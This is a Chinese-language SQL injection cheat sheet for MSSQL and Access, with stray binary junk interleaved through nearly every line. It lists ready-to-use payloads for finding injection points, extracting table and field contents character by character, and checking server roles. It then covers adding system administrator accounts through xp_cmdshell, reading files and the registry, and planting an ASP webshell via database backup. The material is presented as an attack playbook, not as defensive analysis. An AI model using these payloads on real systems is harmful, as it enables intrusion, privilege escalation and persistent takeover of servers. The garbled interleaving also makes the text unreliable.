1.判断是否有注入;and 1=1 ;and 1=2 Zma�Gp* Wj
2.初步判断是否是mssql ;and user>0 F0�KNkL>&g
so_^%)
gdJ
3.注入参数是字符'and [查询条件] and ''=' C�ig!���3�
�S9{&.[O��
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 2[I[I*"�_d
ZsN3 MbY��
5.判断数据库系统 M5��c
*v�s
�
U92?e}=]
;and (select count(*) from sysobjects)>0 mssql s�Ns��H�l�
$D;-;5[-/r
;and (select count(*) from msysobjects)>0 access :�wz]d ~)
I�<!,_$��:
%�ZT��I ?a
Lm7fz9F%�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �~}g)����N
��?�P�"j5�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �e$N1�m:1*
I>:.f�HvUC
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ,~>�u<Wc!S
��Bxk2P<�d
9.(1)猜字段的ascii值(access) �ofuQ`g1hb
UQO?hZ!y/.
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �+?^l��noX
6.��6x$y3v
(2)猜字段的ascii值(mssql) C�O{�A�C�~
V��`xE�&BI
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �+m4?a�\�U
x �}i'2��
10.测试权限结构(mssql) 7�'RU\0Q�G
(|sqN8�SbA
�/�vAA]�n8
�&V�bc�wv@
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- &24>9���
xbs�X�-�F�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 7l3�Dx�w/N
D)bR-�a_�^
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ZU.f�)94�u
Idr|-s%l6'
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Qk8YR5�K
�
8_{X�rT�w(
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- {j�o"@&2S
H�iEQs|""'
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- n���i-4�~k
ew1b�b �K>
;and 1=(select IS_MEMBER('db_owner'));-- &?M��'(` ~
=' &TqiIv"
�$�O,�IXA�
7%yP�5c
�B
11.添加mssql和系统的帐户 Q�A����#Jx
W{nD�mG`yp
;exec master.dbo.sp_addlogin username;-- �YL�id�2aF
;exec master.dbo.sp_password null,username,password;-- -9yW�f�8�;
PY[!�H<t�t
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Vc&xXtm�[v
D`NQEt"�(
;exec master.dbo.xp_cmdshell 'net user username password dwz�{�Yw(�
�M�9/J�!s�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Yi�C�_,8A~
a3^�({;k!0
;exec master.dbo.xp_cmdshell 'net user username password /add';-- .1h�1J�� �
M3YC@(N% k
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 8g�6G},Y0�
� &W?
�hCr
�J"
U!j���
o_�?A^��u�
12.(1)遍历目录 -b�p7X{�&�
6mC%� zXR5
;create table dirs(paths varchar(100), id int) 0]2@T=*kTY
*7�K)J8�kq
;insert dirs exec master.dbo.xp_dirtree 'c:\' 1VB{dg��r�
0ae}!��LO
;and (select top 1 paths from dirs)>0 �e`;��U9Z�
kx�07�Iu�m
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Mf`@��X[-;
-_fh=}.n+"
��g B�V66L
=QW�:},sp
(2)遍历目录 � S/Gy:GIf
�Pql;5
~/
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- RaAvPIJa |
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 U&L?�IT=x�
U��E
���K$
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 v v]rXJu1�
D]hwG�0Chd
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ��It�wJL�`
�5j#XNc)"
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 dP�yZzMes=
G$CI~0Se:�
7hl,dtn7�
' O �d_:]�
13.mssql中的存储过程 we2D!�Y�wr
9pq-"?vHY0
xp_regenumvalues 注册表根键, 子键 �SAN/�fn�M
�
ui1h� �M
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 fC�!+"g5�5
R�2dCp|6�A
xp_regread 根键,子键,键值名 -+&�sP�r�Q
|�v= */�e�
;exec xp_regread Y�E1X*'4��
[+>cW�0�a�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 <jtu/U]78|
3L-�}B#tI�
xp_regwrite 根键,子键, 值名, 值类型, 值 �P{o�/�/M�
�I�]�0
D*z
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Ugv"A�;�l
IGcY�P�L\&
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Un{�9reX5
�@��M8vP�H
xp_regdeletevalue 根键,子键,值名 ���yn KgNi
9��vJ'9Z2\
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ]B9�Ut&mF;
U$AV"F&!&}
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 "78BApjWT6
'{:lP"\,L�
xQ�@gh
( (
d�(;Qe}ok>
14.mssql的backup创建webshell �DT>Gi�ic
�m7NrS�?7
use model p^�?]xD�(
j�t4c*0��z
create table cmd(str image); uI�+^8-HZ;
�I�j�n�O2X
insert into cmd(str) values (''); (x�lA����S
F�!�~�o�J
backup database model to disk='c:\l.asp'; QO�KE�9R#Y
G�B�`
�G(a
a��v4g/7�=
y��ZqX[��U
15.mssql内置函数 �|-.r9;�-b
`T~�~yM)q�
;and (select @@version)>0 获得Windows的版本号 �rd!4�u�14
/\|Be�hif�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa l|'{Cb��
�
1g �bqHxWI
;and (select user_name())>0 爆当前系统的连接用户 0v�'FE35~s
|(O _�K(�
;and (select db_name())>0 得到当前连接的数据库 ul[�+v�pH9
G�JbU��1k]
0ZjinWkR[�
9{XC9��\~�
16.简洁的webshell pTIE.:�g�(
��q��5u�"v
use model a�hqsbNu�1
@#KZ�2��^�
create table cmd(str image); %Astfn(U{4
~9�1) DNaE
insert into cmd(str) values (''); X�on�I� ��
�V~_aM�@q1
backup database model to disk='g:\wwwtest\l.asp';
